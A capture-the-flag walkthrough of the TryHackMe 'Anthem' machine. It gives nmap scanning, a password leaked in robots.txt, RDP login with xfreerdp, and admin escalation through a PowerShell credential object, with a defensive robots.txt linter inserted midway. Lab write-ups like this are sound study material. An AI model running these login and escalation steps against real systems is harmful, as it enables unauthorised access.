Anthem

You can find this machine here: https://tryhackme.com/room/anthem

Port Scan

┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -Pn 10.10.24.60                  

PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

Information Gathering

Domain Name

┌──(kali㉿Zeus)-[~]
└─$ cat /etc/hosts | grep com
10.10.24.60     anthem.com

Robots.txt & Password

┌──(kali㉿Zeus)-[~]
└─$ curl http://anthem.com/robots.txt
UmbracoIsTheBest!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/
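
From the defender's side, the stray first line in the file above is the kind of thing a pre-deployment check catches. The following is an added example, not part of the original write-up: a small linter that flags any robots.txt line that is not blank, a comment, or a known "field: value" record. The function names, the list of accepted fields and the sample file (including its stand-in first line) are assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): lint robots.txt for stray lines.

# Record fields treated as legitimate: the RFC 9309 ones plus two common extensions.
KNOWN_FIELDS='user-agent|allow|disallow|sitemap|crawl-delay'

# Reads robots.txt on stdin and prints "LINE_NO<TAB>TEXT" for every line that is
# not blank, not a comment, and not a "known-field: value" record.
robots_stray_lines() {
    tr -d '\r' | awk -v known="^(${KNOWN_FIELDS})\$" '
        /^[ \t]*$/ { next }                 # blank line
        /^[ \t]*#/ { next }                 # comment line
        {
            idx = index($0, ":")
            if (idx > 0) {
                field = tolower(substr($0, 1, idx - 1))
                gsub(/^[ \t]+|[ \t]+$/, "", field)
                if (field ~ known) next     # well-formed record
            }
            printf "%d\t%s\n", NR, $0       # anything else is worth a look
        }'
}

# Constructed sample with the same layout as the file fetched above; the first
# line is a made-up stand-in for the stray string.
sample_robots() {
    cat <<'EOF'
ExampleSecretString!

# Use for all search robots
User-agent: *

# Define the directories not to crawl
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/
EOF
}

# Demo run: reports line 1 of the constructed sample.
sample_robots | robots_stray_lines
```

To check a live file, pipe it in: curl -s http://anthem.com/robots.txt | robots_stray_lines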

Users & Emails

James Orchard Halliwell
Jane Doe
JD@anthem.com
Solomon Grundy
SG@anthem

User Owned

xfreerdp /f /v:anthem.com /u:'sg'  /p:'Umbraco<REMOVED>Best!'

File Enumeration & Change Permissions

C:\Users\SG>dir C:\ /a:h /b /s
C:\$Recycle.Bin
C:\backup
C:\Documents and Settings
C:\pagefile.sys
C:\Recovery
C:\System Volume Information
C:\$Recycle.Bin\S-1-5-21-3886845925-2521176483-1368255183-500
C:\Program Files\desktop.ini
C:\Program Files\Uninstall Information
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Uninstall Information
C:\Program Files (x86)\Windows Sidebar
C:\ProgramData\Application Data
C:\ProgramData\Desktop
C:\ProgramData\Documents
<snip>

ChangeMe<REMOVED>1MoreTime

System Owned

$secpasswd = ConvertTo-SecureString -AsPlainText -Force -String 'ChangeMe<REMOVED>1MoreTime'
$mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd)
Start-Process powershell.exe -Credential $mycreds

or

xfreerdp /f /v:anthem.com /u:'administrator'  /p:'ChangeMe<REMOVED>1MoreTime'
